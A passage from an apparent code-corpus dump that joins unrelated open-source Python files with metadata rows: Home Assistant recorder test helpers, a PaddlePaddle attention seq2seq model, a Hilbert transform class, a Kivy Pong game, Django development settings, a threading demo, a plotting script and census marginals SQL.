stats = statistics_during_period(hass, four)
assert stats == {}
def record_states(hass):
"""Record some test states.
We inject a bunch of state updates for temperature sensors.
"""
mp = "media_player.test"
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns1_attr = {"device_class": "temperature", "state_class": "measurement"}
sns2_attr = {"device_class": "temperature"}
sns3_attr = {}
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=1)
two = one + timedelta(minutes=15)
three = two + timedelta(minutes=30)
four = three + timedelta(minutes=15)
states = {mp: [], sns1: [], sns2: [], sns3: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[mp].append(
set_state(mp, "idle", attributes={"media_title": str(sentinel.mt1)})
)
states[mp].append(
set_state(mp, "YouTube", attributes={"media_title": str(sentinel.mt2)})
)
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "10", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "15", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "15", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "15", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, "20", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "20", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "20", attributes=sns3_attr))
return zero, four, states
def record_energy_states(hass, _sns1_attr, _sns2_attr, _sns3_attr):
"""Record some test states.
We inject a bunch of state updates for energy sensors.
"""
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns4 = "sensor.test4"
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=15)
two = one + timedelta(minutes=30)
three = two + timedelta(minutes=15)
four = three + timedelta(minutes=15)
five = four + timedelta(minutes=30)
six = five + timedelta(minutes=15)
seven = six + timedelta(minutes=15)
eight = seven + timedelta(minutes=30)
sns1_attr = {**_sns1_attr, "last_reset": zero.isoformat()}
sns2_attr = {**_sns2_attr, "last_reset": zero.isoformat()}
sns3_attr = {**_sns3_attr, "last_reset": zero.isoformat()}
sns4_attr = {**_sns3_attr}
states = {sns1: [], sns2: [], sns3: [], sns4: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=zero):
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "110", attributes=sns2_attr)) # Sum 0
states[sns3].append(set_state(sns3, "0", attributes=sns3_attr)) # Sum 0
states[sns4].append(set_state(sns4, "0", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[sns1].append(set_state(sns1, "15", attributes=sns1_attr)) # Sum 5
states[sns2].append(set_state(sns2, "120", attributes=sns2_attr)) # Sum 10
states[sns3].append(set_state(sns3, "0", attributes=sns3_attr)) # Sum 0
states[sns4].append(set_state(sns4, "0", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "20", attributes=sns1_attr)) # Sum 10
states[sns2].append(set_state(sns2, "130", attributes=sns2_attr)) # Sum 20
states[sns3].append(set_state(sns3, "5", attributes=sns3_attr)) # Sum 5
states[sns4].append(set_state(sns4, "5", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "0", attributes=sns2_attr)) # Sum -110
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr)) # Sum 10
states[sns4].append(set_state(sns4, "10", attributes=sns4_attr)) # -
sns1_attr = {**_sns1_attr, "last_reset": four.isoformat()}
sns2_attr = {**_sns2_attr, "last_reset": four.isoformat()}
sns3_attr = {**_sns3_attr, "last_reset": four.isoformat()}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=four):
states[sns1].append(set_state(sns1, "30", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "30", attributes=sns2_attr)) # Sum -110
states[sns3].append(set_state(sns3, "30", attributes=sns3_attr)) # Sum 10
states[sns4].append(set_state(sns4, "30", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=five):
states[sns1].append(set_state(sns1, "40", attributes=sns1_attr)) # Sum 10
states[sns2].append(set_state(sns2, "45", attributes=sns2_attr)) # Sum -95
states[sns3].append(set_state(sns3, "50", attributes=sns3_attr)) # Sum 30
states[sns4].append(set_state(sns4, "50", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=six):
states[sns1].append(set_state(sns1, "50", attributes=sns1_attr)) # Sum 20
states[sns2].append(set_state(sns2, "55", attributes=sns2_attr)) # Sum -85
states[sns3].append(set_state(sns3, "60", attributes=sns3_attr)) # Sum 40
states[sns4].append(set_state(sns4, "60", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=seven):
states[sns1].append(set_state(sns1, "60", attributes=sns1_attr)) # Sum 30
states[sns2].append(set_state(sns2, "65", attributes=sns2_attr)) # Sum -75
states[sns3].append(set_state(sns3, "80", attributes=sns3_attr)) # Sum 60
states[sns4].append(set_state(sns4, "80", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=eight):
states[sns1].append(set_state(sns1, "70", attributes=sns1_attr)) # Sum 40
states[sns2].append(set_state(sns2, "75", attributes=sns2_attr)) # Sum -65
states[sns3].append(set_state(sns3, "90", attributes=sns3_attr)) # Sum 70
return zero, four, eight, states
def record_states_partially_unavailable(hass):
"""Record some test states.
    We inject a bunch of state updates for temperature sensors.
"""
mp = "media_player.test"
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns1_attr = {"device_class": "temperature", "state_class": "measurement"}
sns2_attr = {"device_class": "temperature"}
sns3_attr = {}
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=1)
two = one + timedelta(minutes=15)
three = two + timedelta(minutes=30)
four = three + timedelta(minutes=15)
states = {mp: [], sns1: [], sns2: [], sns3: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[mp].append(
set_state(mp, "idle", attributes={"media_title": str(sentinel.mt1)})
)
states[mp].append(
set_state(mp, "YouTube", attributes={"media_title": str(sentinel.mt2)})
)
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "10", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "25", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "25", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "25", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, STATE_UNAVAILABLE, attributes=sns1_attr))
states[sns2].append(set_state(sns2, STATE_UNAVAILABLE, attributes=sns2_attr))
states[sns3].append(set_state(sns3, STATE_UNAVAILABLE, attributes=sns3_attr))
return zero, four, states
| apache-2.0 | -4,513,501,656,360,819,000 | 39.773006 | 88 | 0.582405 | false |
kuke/models | fluid/PaddleNLP/neural_machine_translation/rnn_search/attention_model.py | 1 | 8831 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.contrib.decoder.beam_search_decoder import *
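# Note added for clarity (not part of the original source): lstm_step below builds a
# single LSTM step out of plain fc/sigmoid/tanh ops instead of a fused LSTM operator.
# With [h_{t-1}, x_t] denoting the concatenated previous hidden state and input, it
# computes the textbook update:
#   f_t  = sigmoid(W_f [h_{t-1}, x_t] + b_f)    # forget gate
#   i_t  = sigmoid(W_i [h_{t-1}, x_t] + b_i)    # input gate
#   o_t  = sigmoid(W_o [h_{t-1}, x_t] + b_o)    # output gate
#   c~_t = tanh(W_c [h_{t-1}, x_t] + b_c)       # candidate cell state
#   c_t  = f_t * c_{t-1} + i_t * c~_t
#   h_t  = o_t * tanh(c_t)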
def lstm_step(x_t, hidden_t_prev, cell_t_prev, size):
def linear(inputs):
return fluid.layers.fc(input=inputs, size=size, bias_attr=True)
forget_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
input_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
output_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
cell_tilde = fluid.layers.tanh(x=linear([hidden_t_prev, x_t]))
cell_t = fluid.layers.sums(input=[
fluid.layers.elementwise_mul(
x=forget_gate, y=cell_t_prev), fluid.layers.elementwise_mul(
x=input_gate, y=cell_tilde)
])
hidden_t = fluid.layers.elementwise_mul(
x=output_gate, y=fluid.layers.tanh(x=cell_t))
return hidden_t, cell_t
def seq_to_seq_net(embedding_dim, encoder_size, decoder_size, source_dict_dim,
target_dict_dim, is_generating, beam_size, max_length):
"""Construct a seq2seq network."""
def bi_lstm_encoder(input_seq, gate_size):
# A bi-directional lstm encoder implementation.
# Linear transformation part for input gate, output gate, forget gate
# and cell activation vectors need be done outside of dynamic_lstm.
# So the output size is 4 times of gate_size.
input_forward_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
forward, _ = fluid.layers.dynamic_lstm(
input=input_forward_proj, size=gate_size * 4, use_peepholes=False)
input_reversed_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
reversed, _ = fluid.layers.dynamic_lstm(
input=input_reversed_proj,
size=gate_size * 4,
is_reverse=True,
use_peepholes=False)
return forward, reversed
# The encoding process. Encodes the input words into tensors.
src_word_idx = fluid.layers.data(
name='source_sequence', shape=[1], dtype='int64', lod_level=1)
src_embedding = fluid.layers.embedding(
input=src_word_idx,
size=[source_dict_dim, embedding_dim],
dtype='float32')
src_forward, src_reversed = bi_lstm_encoder(
input_seq=src_embedding, gate_size=encoder_size)
encoded_vector = fluid.layers.concat(
input=[src_forward, src_reversed], axis=1)
encoded_proj = fluid.layers.fc(input=encoded_vector,
size=decoder_size,
bias_attr=False)
backward_first = fluid.layers.sequence_pool(
input=src_reversed, pool_type='first')
decoder_boot = fluid.layers.fc(input=backward_first,
size=decoder_size,
bias_attr=False,
act='tanh')
cell_init = fluid.layers.fill_constant_batch_size_like(
input=decoder_boot,
value=0.0,
shape=[-1, decoder_size],
dtype='float32')
cell_init.stop_gradient = False
# Create a RNN state cell by providing the input and hidden states, and
# specifies the hidden state as output.
h = InitState(init=decoder_boot, need_reorder=True)
c = InitState(init=cell_init)
state_cell = StateCell(
inputs={'x': None,
'encoder_vec': None,
'encoder_proj': None},
states={'h': h,
'c': c},
out_state='h')
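    # Note added for clarity (not part of the original source): simple_attention below
    # is a basic content-based attention step. For each decoder step it
    #   1. projects the previous decoder hidden state to decoder_size,
    #   2. expands that projection along the variable-length encoder sequence,
    #   3. adds it to the projected encoder states and scores every position with a
    #      size-1 fc layer,
    #   4. normalises the scores with a sequence softmax, and
    #   5. returns the attention-weighted sum of the encoder vectors as the context.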
def simple_attention(encoder_vec, encoder_proj, decoder_state):
# The implementation of simple attention model
decoder_state_proj = fluid.layers.fc(input=decoder_state,
size=decoder_size,
bias_attr=False)
decoder_state_expand = fluid.layers.sequence_expand(
x=decoder_state_proj, y=encoder_proj)
# concated lod should inherit from encoder_proj
mixed_state = encoder_proj + decoder_state_expand
attention_weights = fluid.layers.fc(input=mixed_state,
size=1,
bias_attr=False)
attention_weights = fluid.layers.sequence_softmax(
input=attention_weights)
        weights_reshape = fluid.layers.reshape(x=attention_weights, shape=[-1])
        scaled = fluid.layers.elementwise_mul(
            x=encoder_vec, y=weights_reshape, axis=0)
context = fluid.layers.sequence_pool(input=scaled, pool_type='sum')
return context
@state_cell.state_updater
def state_updater(state_cell):
# Define the updater of RNN state cell
current_word = state_cell.get_input('x')
encoder_vec = state_cell.get_input('encoder_vec')
encoder_proj = state_cell.get_input('encoder_proj')
prev_h = state_cell.get_state('h')
prev_c = state_cell.get_state('c')
context = simple_attention(encoder_vec, encoder_proj, prev_h)
decoder_inputs = fluid.layers.concat(
input=[context, current_word], axis=1)
h, c = lstm_step(decoder_inputs, prev_h, prev_c, decoder_size)
state_cell.set_state('h', h)
state_cell.set_state('c', c)
# Define the decoding process
if not is_generating:
# Training process
trg_word_idx = fluid.layers.data(
name='target_sequence', shape=[1], dtype='int64', lod_level=1)
trg_embedding = fluid.layers.embedding(
input=trg_word_idx,
size=[target_dict_dim, embedding_dim],
dtype='float32')
# A decoder for training
decoder = TrainingDecoder(state_cell)
with decoder.block():
current_word = decoder.step_input(trg_embedding)
encoder_vec = decoder.static_input(encoded_vector)
encoder_proj = decoder.static_input(encoded_proj)
decoder.state_cell.compute_state(inputs={
'x': current_word,
'encoder_vec': encoder_vec,
'encoder_proj': encoder_proj
})
h = decoder.state_cell.get_state('h')
decoder.state_cell.update_states()
out = fluid.layers.fc(input=h,
size=target_dict_dim,
bias_attr=True,
act='softmax')
decoder.output(out)
label = fluid.layers.data(
name='label_sequence', shape=[1], dtype='int64', lod_level=1)
cost = fluid.layers.cross_entropy(input=decoder(), label=label)
avg_cost = fluid.layers.mean(x=cost)
feeding_list = ["source_sequence", "target_sequence", "label_sequence"]
return avg_cost, feeding_list
else:
# Inference
init_ids = fluid.layers.data(
name="init_ids", shape=[1], dtype="int64", lod_level=2)
init_scores = fluid.layers.data(
name="init_scores", shape=[1], dtype="float32", lod_level=2)
# A beam search decoder
decoder = BeamSearchDecoder(
state_cell=state_cell,
init_ids=init_ids,
init_scores=init_scores,
target_dict_dim=target_dict_dim,
word_dim=embedding_dim,
input_var_dict={
'encoder_vec': encoded_vector,
'encoder_proj': encoded_proj
},
topk_size=50,
sparse_emb=True,
max_len=max_length,
beam_size=beam_size,
end_id=1,
name=None)
decoder.decode()
translation_ids, translation_scores = decoder()
feeding_list = ["source_sequence"]
return translation_ids, translation_scores, feeding_list
| apache-2.0 | -6,780,336,246,658,529,000 | 39.140909 | 79 | 0.576265 | false |
giruenf/GRIPy | algo/spectral/Hilbert.py | 1 | 2141 | # -*- coding: utf-8 -*-
#
# Class for deal with Analytic Signal
# Universidade Estadual do Norte Fluminense - UENF
# Laboratório de Engenharia de Petróleo - LENEP
# Grupo de Inferência em Reservatório - GIR
# Adriano Paulo Laes de Santana
# September 12th, 2017
#
# The following code is based on
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.hilbert.html
import numpy as np
from scipy.signal import hilbert
class HilbertTransform(object):
def __init__(self, real_signal, sampling):
self._fs = 1 / sampling
self._analytic_signal = hilbert(real_signal)
self._amplitude_envelope = np.abs(self._analytic_signal)
self._instantaneous_phase = np.unwrap(np.angle(self._analytic_signal))
self._instantaneous_frequency = (np.diff(self._instantaneous_phase) /
(2.0 * np.pi) * self._fs)
self._instantaneous_frequency = np.insert(self._instantaneous_frequency, 0, np.nan)
@property
def analytic_signal(self):
return self._analytic_signal
@analytic_signal.setter
def analytic_signal(self, value):
raise Exception('')
@analytic_signal.deleter
def analytic_signal(self):
raise Exception('')
@property
def amplitude_envelope(self):
return self._amplitude_envelope
@amplitude_envelope.setter
def amplitude_envelope(self, value):
raise Exception('')
@amplitude_envelope.deleter
def amplitude_envelope(self):
raise Exception('')
@property
def instantaneous_phase(self):
return self._instantaneous_phase
@instantaneous_phase.setter
def instantaneous_phase(self, value):
raise Exception('')
@instantaneous_phase.deleter
def instantaneous_phase(self):
raise Exception('')
@property
def instantaneous_frequency(self):
return self._instantaneous_frequency
@instantaneous_frequency.setter
def instantaneous_frequency(self, value):
raise Exception('')
@instantaneous_frequency.deleter
def instantaneous_frequency(self):
raise Exception('')
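# ---------------------------------------------------------------------------
# Usage sketch added as an illustration; it is not part of the original module.
# It assumes a 10 Hz sine wave sampled every 1 ms and just prints a few of the
# derived quantities.
if __name__ == '__main__':
    t = np.arange(0.0, 1.0, 0.001)
    test_signal = np.sin(2.0 * np.pi * 10.0 * t)
    ht = HilbertTransform(test_signal, sampling=0.001)
    print(ht.amplitude_envelope[:5])        # close to 1.0 away from the edges
    print(ht.instantaneous_frequency[1:6])  # close to 10 Hz
    print(ht.instantaneous_phase[:5])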
| apache-2.0 | 9,056,039,645,876,526,000 | 27.878378 | 91 | 0.669162 | false |
k-yak/kivy_breakout | pong/main.py | 1 | 3115 | import kivy
kivy.require('1.1.3')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.floatlayout import FloatLayout
class Pong(FloatLayout):
pass
class PongPaddle(Widget):
score = NumericProperty(0)
max = 5
cur = 0
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 10)
bounced = Vector(-1 * vx, vy)
if self.max > self.cur:
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
self.cur += 1
else:
ball.velocity = bounced.x, bounced.y + offset
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
def serve_ball(self, vel=(4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def update(self, dt):
self.ball.move()
        #bounce off paddles
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
#bounce ball off bottom or top
if (self.ball.y < self.y) or (self.ball.top > self.top):
self.ball.velocity_y *= -1
        #went off to a side to score a point?
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-4, 0))
def on_touch_move(self, touch):
if touch.x < self.width / 3:
if (touch.y + self.player1.height / 2) > self.height:
self.player1.center_y = self.height - (self.player1.height / 2)
else:
if (touch.y - self.player1.height / 2) < 0:
self.player1.center_y = self.player1.height / 2
else:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
if (touch.y + self.player2.height / 2) > self.height:
self.player2.center_y = self.height - (self.player2.height / 2)
else:
if (touch.y - self.player2.height / 2) < 0:
self.player2.center_y = self.player2.height / 2
else:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0 / 60.0)
return game
if __name__ in ('__main__', '__android__'):
PongApp().run() | mit | -4,741,882,946,873,738,000 | 28.262136 | 79 | 0.545746 | false |
AlphaNerd80/Lists | superlists/settings.py | 1 | 2067 | """
Django settings for superlists project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xmnw6xn$lz)3i1v17lor83lls37&&z-9i@+xasb^f-88h7ew1c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lists',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'superlists.urls'
WSGI_APPLICATION = 'superlists.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| mit | -1,529,950,277,581,714,700 | 23.607143 | 71 | 0.727141 | false |
Moggi/python-playground | queues_thread.py | 1 | 1510 | # From tutorialspoint.com about Python Multithreaded Programming
# https://www.tutorialspoint.com/python/python_multithreading.htm
# !/usr/bin/python
import Queue
import threading
import time
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("Starting " + self.name)
process_data(self.name, self.q)
print("Exiting " + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
threadList = ["Thread-1", "Thread-2", "Thread-3"]
nameList = ["One", "Two", "Three", "Four", "Five"]
queueLock = threading.Lock()
workQueue = Queue.Queue(10)
threads = []
threadID = 1
# Create new threads
for tName in threadList:
thread = myThread(threadID, tName, workQueue)
thread.start()
threads.append(thread)
threadID += 1
# Fill the queue
queueLock.acquire()
for word in nameList:
workQueue.put(word)
queueLock.release()
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print("Exiting Main Thread")
| gpl-2.0 | 3,738,729,254,467,271,700 | 21.205882 | 65 | 0.64106 | false |
asoliveira/NumShip | scripts/plot/r-velo-r-zz-plt.py | 1 | 3085 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#É adimensional?
adi = False
#É para salvar as figuras(True|False)?
save = True
#Caso seja para salvar, qual é o formato desejado?
formato = 'jpg'
#Caso seja para salvar, qual é o diretório que devo salvar?
dircg = 'fig-sen'
#Caso seja para salvar, qual é o nome do arquivo?
nome = 'r-velo-r-zz'
#Qual título colocar no gráficos?
titulo = ''#'Curva de ZigZag'
titulo2=''
#Qual a cor dos gráficos?
pc = 'k'
r1c = 'b'
r2c = 'y'
r3c = 'r'
#Estilo de linha
ps = '-'
r1s = '-'
r2s = '-'
r3s = '-'
import os
import scipy as sp
import matplotlib.pyplot as plt
from libplot import *
acelhis = sp.genfromtxt('../entrada/padrao/CurvaZigZag/velo.dat')
acelhis2 = sp.genfromtxt('../entrada/r/saida1.1/CurvaZigZag/velo.dat')
acelhis3 = sp.genfromtxt('../entrada/r/saida1.2/CurvaZigZag/velo.dat')
acelhis4 = sp.genfromtxt('../entrada/r/saida1.3/CurvaZigZag/velo.dat')
lemehis = sp.genfromtxt('../entrada/padrao/CurvaZigZag/leme.dat')
lemehis2 = sp.genfromtxt('../entrada/r/saida1.1/CurvaZigZag/leme.dat')
lemehis3 = sp.genfromtxt('../entrada/r/saida1.2/CurvaZigZag/leme.dat')
lemehis4 = sp.genfromtxt('../entrada/r/saida1.3/CurvaZigZag/leme.dat')
axl = [0, 1000, -0.7, 0.7]
axl2 = [0, 1000, -25, 25]#rudder axis
#Plotting the turning curve
if adi:
ylabel = r'$t\prime$'
xacellabel = r'$ r\prime$'
else:
ylabel = r'$\dot \psi \quad graus/s$'
xacellabel = r'$t \quad segundos$'
plt.subplot2grid((1,4),(0,0), colspan=3)
#Padrao
plt.plot(acelhis[:, 0], acelhis[:, 6] * (180/sp.pi), color = pc, linestyle = ps,
linewidth = 2, label=ur'padrão')
plt.plot(acelhis2[:, 0], acelhis2[:, 6] * (180/sp.pi), color = r1c,linestyle = r1s,
linewidth = 2, label=ur'1.1--$r$')
plt.plot(acelhis3[:, 0], acelhis3[:, 6] * (180/sp.pi), color = r2c, linestyle = r2s,
linewidth = 2, label=ur'1.2--$r$')
plt.plot(acelhis4[:, 0], acelhis4[:, 6] * (180/sp.pi), color = r3c, linestyle = r3s,
linewidth = 2, label=ur'1.3--$r$')
plt.title(titulo)
plt.legend(bbox_to_anchor=(1.1, 1), loc=2, borderaxespad=0.)
plt.ylabel(ylabel)
plt.xlabel(xacellabel)
plt.axis(axl)
plt.grid(True)
plt.twinx()
plt.plot(lemehis[:, 0], lemehis[:, 1] * (180/sp.pi), color = pc, linestyle = "--",
linewidth = 1, label=ur'leme--padrão')
plt.plot(lemehis2[:, 0], lemehis2[:, 1] * (180/sp.pi), color = r1c, linestyle = "--",
linewidth = 1, label=ur'leme--1.1$r$')
plt.plot(lemehis3[:, 0], lemehis3[:, 1] * (180/sp.pi), color = r2c, linestyle = "--",
linewidth = 1, label=ur'leme--1.2$r$')
plt.plot(lemehis4[:, 0], lemehis4[:, 1] * (180/sp.pi), color = r3c, linestyle = "--",
linewidth = 1, label=ur'leme--1.3$r$')
plt.title(titulo2)
plt.legend(bbox_to_anchor=(1.1, 0), loc=3, borderaxespad=0.)
plt.ylabel(r"$\delta_R$")
plt.axis(axl2)
plt.grid(False)
if save:
if not os.path.exists(dircg):
os.makedirs(dircg)
if os.path.exists(dircg + '/' + nome + '.' + formato):
os.remove(dircg + '/' + nome + '.' + formato)
plt.savefig(dircg + '/' + nome + '.' + formato , format=formato)
else:
plt.show()
| gpl-3.0 | 4,199,525,215,521,507,300 | 30.050505 | 87 | 0.632726 | false |
apdjustino/DRCOG_Urbansim | src/opus_gui/data_manager/run/tools/synthesizer_create_persons_marginals_table.py | 1 | 4218 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, sys
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
from opus_core.database_management.database_server import DatabaseServer
def opusRun(progressCB,logCB,params):
param_dict = {}
for key, val in params.iteritems():
param_dict[str(key)] = str(val)
# get parameter values
database_name = param_dict['database_name']
database_server_connection = param_dict['database_server_connection']
raw_sf3_data_table_name = 'raw_sf3_data'
dbs_config = DatabaseServerConfiguration(database_configuration=database_server_connection)
server = DatabaseServer(database_server_configuration = dbs_config)
opus_db = server.get_database(database_name=database_name)
logCB(" *** WARNING *** \n")
logCB(" *** At the end of this tool, you will need\n")
logCB(" *** to check to make sure each record in the 'person_marginals'\n")
logCB(" *** table has a proper 'pumano' assigned to it. You may need to \n")
logCB(" *** manually update the 'pumano' for each \n")
logCB(" *** block group that this set of queries was \n")
logCB(" *** unable to match up properly due to idiosyncrasies\n")
logCB(" *** in the way that block group ids are recorded\n")
logCB(" *** in the original source files.\n")
opus_db.execute("""
drop table if exists person_marginals;
""")
progressCB(50)
logCB("Creating person_marginals table...\n")
opus_db.execute("""
CREATE TABLE person_marginals
SELECT
mid(GEO_ID, 8, 5) as county,
0 as pumano,
cast(mid(GEO_ID, 13, 6) as unsigned) as tract,
cast(right(GEO_ID, 1) as unsigned) as bg,
P008002 as gender1,
P008041 as gender2,
P008003+P008004+P008005+P008006+P008007+P008042+P008043+P008044+P008045+P008046 as age1,
P008008+P008009+P008010+P008011+P008012+P008013+P008014+P008015+P008016+P008017+P008047+P008048+P008049+P008050+P008051+P008052+P008053+P008054+P008055+P008056 as age2,
P008018+P008019+P008020+P008021+P008022+P008023+P008024+P008025+P008057+P008058+P008059+P008060+P008061+P008062+P008063+P008064 as age3,
P008026+P008027+P008065+P008066 as age4,
P008028+P008029+P008067+P008068 as age5,
P008030+P008031+P008069+P008070 as age6,
P008032+P008033+P008034+P008071+P008072+P008073 as age7,
P008035+P008036+P008037+P008074+P008075+P008076 as age8,
P008038+P008039+P008077+P008078 as age9,
P008040+P008079 as age10,
P006002 as race1,
P006003 as race2,
P006004 as race3,
P006005 as race4,
P006006 as race5,
P006007 as race6,
P006008 as race7,
P008003+P008004+P008005+P008006+P008007+P008008+P008009+P008010+P008011+P008012+P008013+P008014+P008015+P008016+P008017+P008018+P008042+P008043+P008044+P008045+P008046+P008047+P008048+P008049+P008050+P008051+P008052+P008053+P008054+P008055+P008056+P008057 as employment1,
P043004+P043006+P043011+P043013 as employment2,
P043007+P043014 as employment3,
P043008+P043015 as employment4
from raw_sf3_data;
""")
logCB("Updating PUMA identifier...\n")
opus_db.execute("""
UPDATE person_marginals h, pums_id_to_bg_id p
SET h.pumano = p.puma5
WHERE h.county = p.county AND h.tract = p.tract AND h.bg = p.bg;
""")
progressCB(90)
logCB("Closing database connection...\n")
opus_db.close()
